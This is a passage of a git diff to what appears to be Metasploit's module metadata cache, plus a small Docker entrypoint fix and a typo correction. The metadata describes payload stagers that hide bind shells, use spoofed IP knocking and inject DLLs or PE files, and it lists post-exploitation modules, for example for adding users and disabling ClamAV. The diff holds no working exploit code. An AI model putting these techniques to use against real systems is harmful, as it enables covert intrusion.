"description": "Inject a custom DLL into the exploited process.\n\nListen for a connection from a hidden port and spawn a command shell to the allowed host.",
"references": [
"URL-http://www.shelliscoming.com/2014/03/hidden-bind-shell-keep-your-shellcode.html"
],
"platform": "Windows",
"arch": "x86",
@@ -224565,7 +227839,7 @@
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2020-09-22 02:56:51 +0000",
"mod_time": "2023-07-27 16:02:37 +0000",
"path": "/modules/payloads/stagers/windows/bind_hidden_tcp.rb",
"is_install_path": true,
"ref_name": "windows/patchupdllinject/bind_hidden_tcp",
@@ -225298,7 +228572,7 @@
],
"description": "Inject the meterpreter server DLL (staged).\n\nListen for a connection. First, the port will need to be knocked from\nthe IP defined in KHOST. This IP will work as an authentication method\n(you can spoof it with tools like hping). After that you could get your\nshellcode from any IP. The socket will appear as \"closed,\" thus helping to\nhide the shellcode",
"references": [
"URL-http://www.shelliscoming.com/2014/07/ip-knock-shellcode-spoofed-ip-as.html"
],
"platform": "Windows",
"arch": "x86",
@@ -225306,7 +228580,7 @@
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2020-09-22 02:56:51 +0000",
"mod_time": "2023-07-27 16:02:37 +0000",
"path": "/modules/payloads/stagers/windows/bind_hidden_ipknock_tcp.rb",
"is_install_path": true,
"ref_name": "windows/patchupmeterpreter/bind_hidden_ipknock_tcp",
@@ -225340,7 +228614,7 @@
],
"description": "Inject the meterpreter server DLL (staged).\n\nListen for a connection from a hidden port and spawn a command shell to the allowed host.",
"references": [
"URL-http://www.shelliscoming.com/2014/03/hidden-bind-shell-keep-your-shellcode.html"
],
"platform": "Windows",
"arch": "x86",
@@ -225348,7 +228622,7 @@
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2020-09-22 02:56:51 +0000",
"mod_time": "2023-07-27 16:02:37 +0000",
"path": "/modules/payloads/stagers/windows/bind_hidden_tcp.rb",
"is_install_path": true,
"ref_name": "windows/patchupmeterpreter/bind_hidden_tcp",
@@ -226081,7 +229355,8 @@
],
"description": "Inject a custom native PE file into the exploited process using a reflective PE loader. The reflective PE\nloader will execute the pre-mapped PE image starting from the address of entry after performing image base\nrelocation and API address resolution. This module requires a PE file that contains relocation data and a\nvalid (uncorrupted) import table. PE files with CLR(C#/.NET executables), bounded imports, and TLS callbacks\nare not currently supported. Also PE files which use resource loading might crash.\nListen for a connection. First, the port will need to be knocked from\n the IP defined in KHOST. This IP will work as an authentication method\n (you can spoof it with tools like hping). After that you could get your\n shellcode from any IP. The socket will appear as \"closed,\" thus helping to\n hide the shellcode",
"references": [
"URL-https://github.com/EgeBalci/Amber",
"URL-http://www.shelliscoming.com/2014/07/ip-knock-shellcode-spoofed-ip-as.html"
],
"platform": "Windows",
"arch": "x86",
@@ -226089,7 +229364,7 @@
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2020-09-22 02:56:51 +0000",
"mod_time": "2023-07-27 16:02:37 +0000",
"path": "/modules/payloads/stagers/windows/bind_hidden_ipknock_tcp.rb",
"is_install_path": true,
"ref_name": "windows/peinject/bind_hidden_ipknock_tcp",
@@ -226123,7 +229398,8 @@
],
"description": "Inject a custom native PE file into the exploited process using a reflective PE loader. The reflective PE\nloader will execute the pre-mapped PE image starting from the address of entry after performing image base\nrelocation and API address resolution. This module requires a PE file that contains relocation data and a\nvalid (uncorrupted) import table. PE files with CLR(C#/.NET executables), bounded imports, and TLS callbacks\nare not currently supported. Also PE files which use resource loading might crash.\nListen for a connection from a hidden port and spawn a command shell to the allowed host.",
"references": [
"URL-https://github.com/EgeBalci/Amber",
"URL-http://www.shelliscoming.com/2014/03/hidden-bind-shell-keep-your-shellcode.html"
],
"platform": "Windows",
"arch": "x86",
@@ -226131,7 +229407,7 @@
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2020-09-22 02:56:51 +0000",
"mod_time": "2023-07-27 16:02:37 +0000",
"path": "/modules/payloads/stagers/windows/bind_hidden_tcp.rb",
"is_install_path": true,
"ref_name": "windows/peinject/bind_hidden_tcp",
@@ -226164,7 +229440,7 @@
],
"description": "Inject a custom native PE file into the exploited process using a reflective PE loader. The reflective PE\nloader will execute the pre-mapped PE image starting from the address of entry after performing image base\nrelocation and API address resolution. This module requires a PE file that contains relocation data and a\nvalid (uncorrupted) import table. PE files with CLR(C#/.NET executables), bounded imports, and TLS callbacks\nare not currently supported. Also PE files which use resource loading might crash.\nListen for an IPv6 connection (Windows x86)",
"references": [
"URL-https://github.com/EgeBalci/Amber"
],
"platform": "Windows",
"arch": "x86",
@@ -226206,7 +229482,7 @@
],
"description": "Inject a custom native PE file into the exploited process using a reflective PE loader. The reflective PE\nloader will execute the pre-mapped PE image starting from the address of entry after performing image base\nrelocation and API address resolution. This module requires a PE file that contains relocation data and a\nvalid (uncorrupted) import table. PE files with CLR(C#/.NET executables), bounded imports, and TLS callbacks\nare not currently supported. Also PE files which use resource loading might crash.\nListen for an IPv6 connection with UUID Support (Windows x86)",
"references": [
"URL-https://github.com/EgeBalci/Amber"
],
"platform": "Windows",
"arch": "x86",
@@ -226245,7 +229521,7 @@
],
"description": "Inject a custom native PE file into the exploited process using a reflective PE loader. The reflective PE\nloader will execute the pre-mapped PE image starting from the address of entry after performing image base\nrelocation and API address resolution. This module requires a PE file that contains relocation data and a\nvalid (uncorrupted) import table. PE files with CLR(C#/.NET executables), bounded imports, and TLS callbacks\nare not currently supported. Also PE files which use resource loading might crash.\nListen for a pipe connection (Windows x86)",
"references": [
"URL-https://github.com/EgeBalci/Amber"
],
"platform": "Windows",
"arch": "x86",
@@ -226284,7 +229560,7 @@
],
"description": "Inject a custom native PE file into the exploited process using a reflective PE loader. The reflective PE\nloader will execute the pre-mapped PE image starting from the address of entry after performing image base\nrelocation and API address resolution. This module requires a PE file that contains relocation data and a\nvalid (uncorrupted) import table. PE files with CLR(C#/.NET executables), bounded imports, and TLS callbacks\nare not currently supported. Also PE files which use resource loading might crash.\nListen for a connection (No NX)",
"references": [
"URL-https://github.com/EgeBalci/Amber"
],
"platform": "Windows",
"arch": "x86",
@@ -226325,7 +229601,7 @@
],
"description": "Inject a custom native PE file into the exploited process using a reflective PE loader. The reflective PE\nloader will execute the pre-mapped PE image starting from the address of entry after performing image base\nrelocation and API address resolution. This module requires a PE file that contains relocation data and a\nvalid (uncorrupted) import table. PE files with CLR(C#/.NET executables), bounded imports, and TLS callbacks\nare not currently supported. Also PE files which use resource loading might crash.\nListen for a connection (Windows x86)",
"references": [
"URL-https://github.com/EgeBalci/Amber"
],
"platform": "Windows",
"arch": "x86",
@@ -226368,7 +229644,7 @@
],
"description": "Inject a custom native PE file into the exploited process using a reflective PE loader. The reflective PE\nloader will execute the pre-mapped PE image starting from the address of entry after performing image base\nrelocation and API address resolution. This module requires a PE file that contains relocation data and a\nvalid (uncorrupted) import table. PE files with CLR(C#/.NET executables), bounded imports, and TLS callbacks\nare not currently supported. Also PE files which use resource loading might crash.\nListen for a connection",
"references": [
"URL-https://github.com/EgeBalci/Amber"
],
"platform": "Windows",
"arch": "x86",
@@ -226408,7 +229684,7 @@
],
"description": "Inject a custom native PE file into the exploited process using a reflective PE loader. The reflective PE\nloader will execute the pre-mapped PE image starting from the address of entry after performing image base\nrelocation and API address resolution. This module requires a PE file that contains relocation data and a\nvalid (uncorrupted) import table. PE files with CLR(C#/.NET executables), bounded imports, and TLS callbacks\nare not currently supported. Also PE files which use resource loading might crash.\nListen for a connection with UUID Support (Windows x86)",
"references": [
"URL-https://github.com/EgeBalci/Amber"
],
"platform": "Windows",
"arch": "x86",
@@ -226447,7 +229723,7 @@
],
"description": "Inject a custom native PE file into the exploited process using a reflective PE loader. The reflective PE\nloader will execute the pre-mapped PE image starting from the address of entry after performing image base\nrelocation and API address resolution. This module requires a PE file that contains relocation data and a\nvalid (uncorrupted) import table. PE files with CLR(C#/.NET executables), bounded imports, and TLS callbacks\nare not currently supported. Also PE files which use resource loading might crash.\nUse an established connection",
"references": [
"URL-https://github.com/EgeBalci/Amber"
],
"platform": "Windows",
"arch": "x86",
@@ -226488,7 +229764,7 @@
],
"description": "Inject a custom native PE file into the exploited process using a reflective PE loader. The reflective PE\nloader will execute the pre-mapped PE image starting from the address of entry after performing image base\nrelocation and API address resolution. This module requires a PE file that contains relocation data and a\nvalid (uncorrupted) import table. PE files with CLR(C#/.NET executables), bounded imports, and TLS callbacks\nare not currently supported. Also PE files which use resource loading might crash.\nConnect back to the attacker over IPv6",
"references": [
"URL-https://github.com/EgeBalci/Amber"
],
"platform": "Windows",
"arch": "x86",
@@ -226527,7 +229803,7 @@
],
"description": "Inject a custom native PE file into the exploited process using a reflective PE loader. The reflective PE\nloader will execute the pre-mapped PE image starting from the address of entry after performing image base\nrelocation and API address resolution. This module requires a PE file that contains relocation data and a\nvalid (uncorrupted) import table. PE files with CLR(C#/.NET executables), bounded imports, and TLS callbacks\nare not currently supported. Also PE files which use resource loading might crash.\nConnect back to the attacker via a named pipe pivot",
"references": [
"URL-https://github.com/EgeBalci/Amber"
],
"platform": "Windows",
"arch": "x86",
@@ -226566,7 +229842,7 @@
],
"description": "Inject a custom native PE file into the exploited process using a reflective PE loader. The reflective PE\nloader will execute the pre-mapped PE image starting from the address of entry after performing image base\nrelocation and API address resolution. This module requires a PE file that contains relocation data and a\nvalid (uncorrupted) import table. PE files with CLR(C#/.NET executables), bounded imports, and TLS callbacks\nare not currently supported. Also PE files which use resource loading might crash.\nConnect back to the attacker (No NX)",
"references": [
"URL-https://github.com/EgeBalci/Amber"
],
"platform": "Windows",
"arch": "x86",
@@ -226605,7 +229881,7 @@
],
"description": "Inject a custom native PE file into the exploited process using a reflective PE loader. The reflective PE\nloader will execute the pre-mapped PE image starting from the address of entry after performing image base\nrelocation and API address resolution. This module requires a PE file that contains relocation data and a\nvalid (uncorrupted) import table. PE files with CLR(C#/.NET executables), bounded imports, and TLS callbacks\nare not currently supported. Also PE files which use resource loading might crash.\nConnect back to the attacker",
"references": [
"URL-https://github.com/EgeBalci/Amber"
],
"platform": "Windows",
"arch": "x86",
@@ -226646,7 +229922,7 @@
],
"description": "Inject a custom native PE file into the exploited process using a reflective PE loader. The reflective PE\nloader will execute the pre-mapped PE image starting from the address of entry after performing image base\nrelocation and API address resolution. This module requires a PE file that contains relocation data and a\nvalid (uncorrupted) import table. PE files with CLR(C#/.NET executables), bounded imports, and TLS callbacks\nare not currently supported. Also PE files which use resource loading might crash.\nConnect back to the attacker",
"references": [
"URL-https://github.com/EgeBalci/Amber"
],
"platform": "Windows",
"arch": "x86",
@@ -226687,7 +229963,7 @@
],
"description": "Inject a custom native PE file into the exploited process using a reflective PE loader. The reflective PE\nloader will execute the pre-mapped PE image starting from the address of entry after performing image base\nrelocation and API address resolution. This module requires a PE file that contains relocation data and a\nvalid (uncorrupted) import table. PE files with CLR(C#/.NET executables), bounded imports, and TLS callbacks\nare not currently supported. Also PE files which use resource loading might crash.\nTry to connect back to the attacker, on all possible ports (1-65535, slowly)",
"references": [
"URL-https://github.com/EgeBalci/Amber"
],
"platform": "Windows",
"arch": "x86",
@@ -226729,7 +230005,7 @@
],
"description": "Inject a custom native PE file into the exploited process using a reflective PE loader. The reflective PE\nloader will execute the pre-mapped PE image starting from the address of entry after performing image base\nrelocation and API address resolution. This module requires a PE file that contains relocation data and a\nvalid (uncorrupted) import table. PE files with CLR(C#/.NET executables), bounded imports, and TLS callbacks\nare not currently supported. Also PE files which use resource loading might crash.\nConnect back to the attacker",
"references": [
"URL-https://github.com/EgeBalci/Amber"
],
"platform": "Windows",
"arch": "x86",
@@ -226772,7 +230048,7 @@
],
"description": "Inject a custom native PE file into the exploited process using a reflective PE loader. The reflective PE\nloader will execute the pre-mapped PE image starting from the address of entry after performing image base\nrelocation and API address resolution. This module requires a PE file that contains relocation data and a\nvalid (uncorrupted) import table. PE files with CLR(C#/.NET executables), bounded imports, and TLS callbacks\nare not currently supported. Also PE files which use resource loading might crash.\nConnect back to the attacker",
"references": [
"URL-https://github.com/EgeBalci/Amber"
],
"platform": "Windows",
"arch": "x86",
@@ -226815,7 +230091,7 @@
],
"description": "Inject a custom native PE file into the exploited process using a reflective PE loader. The reflective PE\nloader will execute the pre-mapped PE image starting from the address of entry after performing image base\nrelocation and API address resolution. This module requires a PE file that contains relocation data and a\nvalid (uncorrupted) import table. PE files with CLR(C#/.NET executables), bounded imports, and TLS callbacks\nare not currently supported. Also PE files which use resource loading might crash.\nConnect back to the attacker",
"references": [
"URL-https://github.com/EgeBalci/Amber"
],
"platform": "Windows",
"arch": "x86",
@@ -226855,7 +230131,7 @@
],
"description": "Inject a custom native PE file into the exploited process using a reflective PE loader. The reflective PE\nloader will execute the pre-mapped PE image starting from the address of entry after performing image base\nrelocation and API address resolution. This module requires a PE file that contains relocation data and a\nvalid (uncorrupted) import table. PE files with CLR(C#/.NET executables), bounded imports, and TLS callbacks\nare not currently supported. Also PE files which use resource loading might crash.\nConnect back to the attacker with UUID Support",
"references": [
"URL-https://github.com/EgeBalci/Amber"
],
"platform": "Windows",
"arch": "x86",
@@ -227086,7 +230362,7 @@
],
"description": "Spawn a piped command shell (staged).\n\nListen for a connection. First, the port will need to be knocked from\nthe IP defined in KHOST. This IP will work as an authentication method\n(you can spoof it with tools like hping). After that you could get your\nshellcode from any IP. The socket will appear as \"closed,\" thus helping to\nhide the shellcode",
"references": [
"URL-http://www.shelliscoming.com/2014/07/ip-knock-shellcode-spoofed-ip-as.html"
],
"platform": "Windows",
"arch": "x86",
@@ -227094,7 +230370,7 @@
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2020-09-22 02:56:51 +0000",
"mod_time": "2023-07-27 16:02:37 +0000",
"path": "/modules/payloads/stagers/windows/bind_hidden_ipknock_tcp.rb",
"is_install_path": true,
"ref_name": "windows/shell/bind_hidden_ipknock_tcp",
@@ -227128,7 +230404,7 @@
],
"description": "Spawn a piped command shell (staged).\n\nListen for a connection from a hidden port and spawn a command shell to the allowed host.",
"references": [
"URL-http://www.shelliscoming.com/2014/03/hidden-bind-shell-keep-your-shellcode.html"
],
"platform": "Windows",
"arch": "x86",
@@ -227136,7 +230412,7 @@
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2020-09-22 02:56:51 +0000",
"mod_time": "2023-07-27 16:02:37 +0000",
"path": "/modules/payloads/stagers/windows/bind_hidden_tcp.rb",
"is_install_path": true,
"ref_name": "windows/shell/bind_hidden_tcp",
@@ -227980,7 +231256,7 @@
],
"description": "Listen for a connection from certain IP and spawn a command shell.\n The shellcode will reply with a RST packet if the connections is not\n coming from the IP defined in AHOST. This way the port will appear\n as \"closed\" helping us to hide the shellcode.",
"references": [
"URL-http://www.shelliscoming.com/2014/03/hidden-bind-shell-keep-your-shellcode.html"
],
"platform": "Windows",
"arch": "x86",
@@ -227988,7 +231264,7 @@
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2021-01-05 14:59:46 +0000",
"mod_time": "2023-07-27 16:02:37 +0000",
"path": "/modules/payloads/singles/windows/shell_hidden_bind_tcp.rb",
"is_install_path": true,
"ref_name": "windows/shell_hidden_bind_tcp",
@@ -228093,7 +231369,7 @@
],
"description": "Uploads an executable and runs it (staged).\n\nListen for a connection. First, the port will need to be knocked from\nthe IP defined in KHOST. This IP will work as an authentication method\n(you can spoof it with tools like hping). After that you could get your\nshellcode from any IP. The socket will appear as \"closed,\" thus helping to\nhide the shellcode",
"references": [
"URL-http://www.shelliscoming.com/2014/07/ip-knock-shellcode-spoofed-ip-as.html"
],
"platform": "Windows",
"arch": "x86",
@@ -228101,7 +231377,7 @@
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2020-09-22 02:56:51 +0000",
"mod_time": "2023-07-27 16:02:37 +0000",
"path": "/modules/payloads/stagers/windows/bind_hidden_ipknock_tcp.rb",
"is_install_path": true,
"ref_name": "windows/upexec/bind_hidden_ipknock_tcp",
@@ -228135,7 +231411,7 @@
],
"description": "Uploads an executable and runs it (staged).\n\nListen for a connection from a hidden port and spawn a command shell to the allowed host.",
"references": [
"URL-http://www.shelliscoming.com/2014/03/hidden-bind-shell-keep-your-shellcode.html"
],
"platform": "Windows",
"arch": "x86",
@@ -228143,7 +231419,7 @@
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2020-09-22 02:56:51 +0000",
"mod_time": "2023-07-27 16:02:37 +0000",
"path": "/modules/payloads/stagers/windows/bind_hidden_tcp.rb",
"is_install_path": true,
"ref_name": "windows/upexec/bind_hidden_tcp",
@@ -228915,7 +232191,8 @@
"description": "Inject a VNC Dll via a reflective loader (staged).\n\nListen for a connection. First, the port will need to be knocked from\nthe IP defined in KHOST. This IP will work as an authentication method\n(you can spoof it with tools like hping). After that you could get your\nshellcode from any IP. The socket will appear as \"closed,\" thus helping to\nhide the shellcode",
"references": [
"URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
"URL-https://github.com/rapid7/ReflectiveDLLInjection"
"URL-https://github.com/rapid7/ReflectiveDLLInjection",
"URL-http://www.shelliscoming.com/2014/07/ip-knock-shellcode-spoofed-ip-as.html"
],
"platform": "Windows",
"arch": "x86",
@@ -228923,7 +232200,7 @@
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2020-09-22 02:56:51 +0000",
"mod_time": "2023-07-27 16:02:37 +0000",
"path": "/modules/payloads/stagers/windows/bind_hidden_ipknock_tcp.rb",
"is_install_path": true,
"ref_name": "windows/vncinject/bind_hidden_ipknock_tcp",
@@ -228957,7 +232234,8 @@
"description": "Inject a VNC Dll via a reflective loader (staged).\n\nListen for a connection from a hidden port and spawn a command shell to the allowed host.",
"references": [
"URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
"URL-https://github.com/rapid7/ReflectiveDLLInjection"
"URL-https://github.com/rapid7/ReflectiveDLLInjection",
"URL-http://www.shelliscoming.com/2014/03/hidden-bind-shell-keep-your-shellcode.html"
],
"platform": "Windows",
"arch": "x86",
@@ -228965,7 +232243,7 @@
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2020-09-22 02:56:51 +0000",
"mod_time": "2023-07-27 16:02:37 +0000",
"path": "/modules/payloads/stagers/windows/bind_hidden_tcp.rb",
"is_install_path": true,
"ref_name": "windows/vncinject/bind_hidden_tcp",
@@ -230576,7 +233854,7 @@
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2022-11-04 00:33:03 +0000",
"mod_time": "2023-08-03 17:10:11 +0000",
"path": "/modules/payloads/singles/windows/x64/messagebox.rb",
"is_install_path": true,
"ref_name": "windows/x64/messagebox",
@@ -231420,7 +234698,7 @@
],
"description": "Inject a custom native PE file into the exploited process using a reflective PE loader. The reflective PE\nloader will execute the pre-mapped PE image starting from the address of entry after performing image base\nrelocation and API address resolution. This module requires a PE file that contains relocation data and a\nvalid (uncorrupted) import table. PE files with CLR(C#/.NET executables), bounded imports, and TLS callbacks\nare not currently supported. Also PE files which use resource loading might crash.\nListen for an IPv6 connection (Windows x64)",
"references": [
"URL-https://github.com/EgeBalci/Amber"
],
"platform": "Windows",
"arch": "x64",
@@ -231460,7 +234738,7 @@
],
"description": "Inject a custom native PE file into the exploited process using a reflective PE loader. The reflective PE\nloader will execute the pre-mapped PE image starting from the address of entry after performing image base\nrelocation and API address resolution. This module requires a PE file that contains relocation data and a\nvalid (uncorrupted) import table. PE files with CLR(C#/.NET executables), bounded imports, and TLS callbacks\nare not currently supported. Also PE files which use resource loading might crash.\nListen for an IPv6 connection with UUID Support (Windows x64)",
"references": [
"URL-https://github.com/EgeBalci/Amber"
],
"platform": "Windows",
"arch": "x64",
@@ -231499,7 +234777,7 @@
],
"description": "Inject a custom native PE file into the exploited process using a reflective PE loader. The reflective PE\nloader will execute the pre-mapped PE image starting from the address of entry after performing image base\nrelocation and API address resolution. This module requires a PE file that contains relocation data and a\nvalid (uncorrupted) import table. PE files with CLR(C#/.NET executables), bounded imports, and TLS callbacks\nare not currently supported. Also PE files which use resource loading might crash.\nListen for a pipe connection (Windows x64)",
"references": [
"URL-https://github.com/EgeBalci/Amber"
],
"platform": "Windows",
"arch": "x64",
@@ -231538,7 +234816,7 @@
],
"description": "Inject a custom native PE file into the exploited process using a reflective PE loader. The reflective PE\nloader will execute the pre-mapped PE image starting from the address of entry after performing image base\nrelocation and API address resolution. This module requires a PE file that contains relocation data and a\nvalid (uncorrupted) import table. PE files with CLR(C#/.NET executables), bounded imports, and TLS callbacks\nare not currently supported. Also PE files which use resource loading might crash.\nListen for a connection (Windows x64)",
"references": [
"URL-https://github.com/EgeBalci/Amber"
],
"platform": "Windows",
"arch": "x64",
@@ -231582,7 +234860,7 @@
],
"description": "Inject a custom native PE file into the exploited process using a reflective PE loader. The reflective PE\nloader will execute the pre-mapped PE image starting from the address of entry after performing image base\nrelocation and API address resolution. This module requires a PE file that contains relocation data and a\nvalid (uncorrupted) import table. PE files with CLR(C#/.NET executables), bounded imports, and TLS callbacks\nare not currently supported. Also PE files which use resource loading might crash.\nConnect back to the attacker",
"references": [
"URL-https://github.com/EgeBalci/Amber"
],
"platform": "Windows",
"arch": "x64",
@@ -231622,7 +234900,7 @@
],
"description": "Inject a custom native PE file into the exploited process using a reflective PE loader. The reflective PE\nloader will execute the pre-mapped PE image starting from the address of entry after performing image base\nrelocation and API address resolution. This module requires a PE file that contains relocation data and a\nvalid (uncorrupted) import table. PE files with CLR(C#/.NET executables), bounded imports, and TLS callbacks\nare not currently supported. Also PE files which use resource loading might crash.\nListen for a connection with UUID Support (Windows x64)",
"references": [
"URL-https://github.com/EgeBalci/Amber"
],
"platform": "Windows",
"arch": "x64",
@@ -231661,7 +234939,7 @@
],
"description": "Inject a custom native PE file into the exploited process using a reflective PE loader. The reflective PE\nloader will execute the pre-mapped PE image starting from the address of entry after performing image base\nrelocation and API address resolution. This module requires a PE file that contains relocation data and a\nvalid (uncorrupted) import table. PE files with CLR(C#/.NET executables), bounded imports, and TLS callbacks\nare not currently supported. Also PE files which use resource loading might crash.\nConnect back to the attacker via a named pipe pivot",
"references": [
"URL-https://github.com/EgeBalci/Amber"
],
"platform": "Windows",
"arch": "x64",
@@ -231700,7 +234978,7 @@
],
"description": "Inject a custom native PE file into the exploited process using a reflective PE loader. The reflective PE\nloader will execute the pre-mapped PE image starting from the address of entry after performing image base\nrelocation and API address resolution. This module requires a PE file that contains relocation data and a\nvalid (uncorrupted) import table. PE files with CLR(C#/.NET executables), bounded imports, and TLS callbacks\nare not currently supported. Also PE files which use resource loading might crash.\nConnect back to the attacker (Windows x64)",
"references": [
"URL-https://github.com/EgeBalci/Amber"
],
"platform": "Windows",
"arch": "x64",
@@ -231744,7 +235022,7 @@
],
"description": "Inject a custom native PE file into the exploited process using a reflective PE loader. The reflective PE\nloader will execute the pre-mapped PE image starting from the address of entry after performing image base\nrelocation and API address resolution. This module requires a PE file that contains relocation data and a\nvalid (uncorrupted) import table. PE files with CLR(C#/.NET executables), bounded imports, and TLS callbacks\nare not currently supported. Also PE files which use resource loading might crash.\nConnect back to the attacker",
"references": [
"URL-https://github.com/EgeBalci/Amber"
],
"platform": "Windows",
"arch": "x64",
@@ -231784,7 +235062,7 @@
],
"description": "Inject a custom native PE file into the exploited process using a reflective PE loader. The reflective PE\nloader will execute the pre-mapped PE image starting from the address of entry after performing image base\nrelocation and API address resolution. This module requires a PE file that contains relocation data and a\nvalid (uncorrupted) import table. PE files with CLR(C#/.NET executables), bounded imports, and TLS callbacks\nare not currently supported. Also PE files which use resource loading might crash.\nConnect back to the attacker with UUID Support (Windows x64)",
"references": [
"URL-https://github.com/EgeBalci/Amber"
],
"platform": "Windows",
"arch": "x64",
@@ -234305,7 +237583,7 @@
"author": [
"James Otten <jamesotten1@gmail.com>"
],
"description": "This module attempts to determine whether the system is running\n inside of a container and if so, which one. This module supports\n detection of Docker, LXC, and systemd nspawn.",
"description": "This module attempts to determine whether the system is running\n inside of a container and if so, which one. This module supports\n detection of Docker, WSL, LXC, Podman and systemd nspawn.",
"references": [
],
@@ -234315,7 +237593,7 @@
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2023-02-08 13:47:34 +0000",
"mod_time": "2023-07-19 19:47:17 +0000",
"path": "/modules/post/linux/gather/checkcontainer.rb",
"is_install_path": true,
"ref_name": "linux/gather/checkcontainer",
@@ -234352,7 +237630,7 @@
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2023-02-08 13:47:34 +0000",
"mod_time": "2023-08-22 12:36:48 +0000",
"path": "/modules/post/linux/gather/checkvm.rb",
"is_install_path": true,
"ref_name": "linux/gather/checkvm",
@@ -235312,6 +238590,52 @@
],
"needs_cleanup": null
},
"post_linux/manage/adduser": {
"name": "Add a new user to the system",
"fullname": "post/linux/manage/adduser",
"aliases": [
],
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"Nick Cottrell <ncottrellweb@gmail.com>"
],
"description": "This command adds a new user to the system",
"references": [
],
"platform": "AIX,BSD,Linux,Solaris,Unix",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2023-10-25 19:28:23 +0000",
"path": "/modules/post/linux/manage/adduser.rb",
"is_install_path": true,
"ref_name": "linux/manage/adduser",
"check": false,
"post_auth": true,
"default_credential": false,
"notes": {
"Stability": [
"crash-safe"
],
"Reliability": [
],
"SideEffects": [
"config-changes"
]
},
"session_types": [
"meterpreter",
"shell"
],
"needs_cleanup": null
},
"post_linux/manage/disable_clamav": {
"name": "Disable ClamAV",
"fullname": "post/linux/manage/disable_clamav",
@@ -236613,7 +239937,7 @@
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2023-06-05 14:21:24 +0000",
"mod_time": "2023-07-18 14:17:15 +0000",
"path": "/modules/post/multi/gather/jenkins_gather.rb",
"is_install_path": true,
"ref_name": "multi/gather/jenkins_gather",
@@ -240460,9 +243784,11 @@
"Carlos Perez <carlos_perez@darkoperator.com>",
"Aaron Soto <aaron_soto@rapid7.com>"
],
"description": "This module attempts to determine whether the system is running\n inside of a virtual environment and if so, which one. This\n module supports detection of Hyper-V, VMWare, Virtual PC,\n VirtualBox, Xen, and QEMU.",
"description": "This module attempts to determine whether the system is running\n inside of a virtual environment and if so, which one. This\n module supports detection of Hyper-V, VMWare, VirtualBox, Xen, QEMU,\n and Parallels.",
"references": [
"URL-https://handlers.sans.org/tliston/ThwartingVMDetection_Liston_Skoudis.pdf",
"URL-https://www.heise.de/security/downloads/07/1/1/8/3/5/5/9/vmde.pdf",
"URL-https://evasions.checkpoint.com/techniques/registry.html"
],
"platform": "Windows",
"arch": "",
@@ -240470,7 +243796,7 @@
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2022-11-29 21:28:15 +0000",
"mod_time": "2023-08-11 14:42:51 +0000",
"path": "/modules/post/windows/gather/checkvm.rb",
"is_install_path": true,
"ref_name": "windows/gather/checkvm",
@@ -244647,7 +247973,7 @@
"author": [
"Joshua Abraham <jabra@rapid7.com>"
],
"description": "This module will enumerate computers included in the primary Domain.",
"description": "This module will enumerate computers included in the primary Active Directory domain.",
"references": [
],
@@ -244657,7 +247983,7 @@
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2023-02-08 13:47:34 +0000",
"mod_time": "2023-10-12 10:59:29 +0000",
"path": "/modules/post/windows/gather/enum_computers.rb",
"is_install_path": true,
"ref_name": "windows/gather/enum_computers",
@@ -244665,9 +247991,20 @@
"post_auth": false,
"default_credential": false,
"notes": {
"Stability": [
"crash-safe"
],
"Reliability": [
],
"SideEffects": [
]
},
"session_types": [
"meterpreter"
"meterpreter",
"powershell",
"shell"
],
"needs_cleanup": null
},
+2 -2
View File
@@ -12,14 +12,14 @@ if [ "$MSF_UID" -eq "0" ]; then
else
# if the users group already exists, create a random GID, otherwise
# reuse it
if ! grep ":$MSF_GID:" /etc/group > /dev/null; then
if ! getent group $MSF_GID > /dev/null; then
addgroup -g $MSF_GID $MSF_GROUP
else
addgroup $MSF_GROUP
fi
# check if user id already exists
if ! grep ":$MSF_UID:" /etc/passwd > /dev/null; then
if ! getent passwd $MSF_UID > /dev/null; then
adduser -u $MSF_UID -D $MSF_USER -g $MSF_USER -G $MSF_GROUP $MSF_USER
# add user to metasploit group so it can read the source
addgroup $MSF_USER $METASPLOIT_GROUP
@@ -93,7 +93,7 @@ One advantage that this directory structure gives us is the ability to write bet
### Shared build tasks
Because all routine module-oriented tasks will be preformed with rake tasks, we will need to make the default actions for these tasks as intelligent and reusable as possible across different module types/implementations. A module author should not have to worry about writing plumbing they do not need (or is common) or messing with plumbing that is only tangentially related to their unique need. To that end, we should have sane defaults for the following at a minimum:
Because all routine module-oriented tasks will be performed with rake tasks, we will need to make the default actions for these tasks as intelligent and reusable as possible across different module types/implementations. A module author should not have to worry about writing plumbing they do not need (or is common) or messing with plumbing that is only tangentially related to their unique need. To that end, we should have sane defaults for the following at a minimum:
```
rake run -- Start module, hook up stdin/stdout to JSON-RPC
@@ -115,4 +115,4 @@ At the very least, we will also need tooling to create a mostly-empty but runnab
### For classic modules
The biggest differences for classic modules are metadata generation and running. These can be accomplished with rake tasks, but it would involve starting up a whole framework instance for each module run. For efficiency, we will need to signal to framework to treat the module specially, perhaps having rake deps:check output/return a specific value when the module needs to be run inside of framework. Metadata would then be dumped directly from the framework loader, and instead of rake run, the classic module loader/runner would be run much as it is today. We will probably want to keep the rake tasks for these things for when we don't already have a framework instance handy.
